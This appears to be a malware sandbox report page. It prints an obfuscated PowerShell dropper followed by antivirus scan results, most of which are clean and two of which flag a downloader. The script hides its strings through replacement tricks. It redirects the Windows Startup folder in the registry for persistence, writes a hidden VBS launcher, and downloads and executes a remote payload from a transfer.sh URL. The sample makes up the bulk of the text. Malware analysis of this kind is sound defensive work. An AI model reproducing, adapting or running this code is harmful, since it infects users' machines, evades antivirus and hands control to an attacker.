Static | ZeroBOX
No static analysis available.
$H1="C:\Use++++++++++++++++++++un".Replace("++++++++++++++++++++","rs\Public\R")
$H2 = "Crea--------------------ry".Replace("--------------------","teDirecto")
[system.io.directory]::$H2($H1)
start-sleep -s 5
$H3 = "HKCU:\Softw-----------------lders".Replace("-----------------","are\Microsoft\Windows\CurrentVersion\Explorer\User Shell Fo")
$H4= "HKCU:\Softwar+++++++++++++++++++++++++++ders".Replace("+++++++++++++++++++++++++++","e\Microsoft\Windows\CurrentVersion\Explorer\Shell Fol")
$H5 = "C:\Us--------------c\Run".Replace("--------------","ers\Publi")
$H6 ="C------------blic\Run".Replace("------------",":\Users\Pu")
Set-ItemProperty -Path $H3 -Name "Startup" -Value $H5;
Set-ItemProperty -Path $H4 -Name "Startup" -Value $H6;
start-sleep -s 5
$Content = @'
Dim SERDTFYUGHIJOPKERSTFYGUH
A1 = "E"
A3 = "W"
A4 = "E" & "L"
Set SERDTFYUGHIJOPKERSTFYGUH= CreateObject(""+A3+"ScriPt.SH"+A4+"L")
Donal="P" &"O" & "W"
Trump = "E"
mike = Chr(82) & "s"&"H" & "E"
pompeo = "L"
Elon =Chr(76)&" $TRUMP = 'http://transfer.sh/1fogyms/dfddefencestudies.txt';$B = 'ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');"
COIN = Donal+Trump++mike+pompeo+Elon+""
SERDTFYUGHIJOPKERSTFYGUH.Run COIN,0,True
Set-Content -Path C:\Users\Public\Run\Run.vbs -Value $Content
start-sleep -s 5
$TRUMP = 'http://transfer.sh/1fogyms/dfddefencestudies.txt';
$B = 'ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');
$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');
$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');
&('I'+'EX')($A -Join '')|&('I'+'EX');
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Emsisoft Clean
Comodo Clean
F-Secure Clean
DrWeb PowerShell.DownLoader.1435
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Sophos Clean
GData Clean
Jiangmin Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Clean
AhnLab-V3 Clean
VBA32 Clean
ALYac Clean
TACHYON Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet VBS/Agent.VRQ!tr
Panda Clean
Qihoo-360 Clean
No IRMA results available.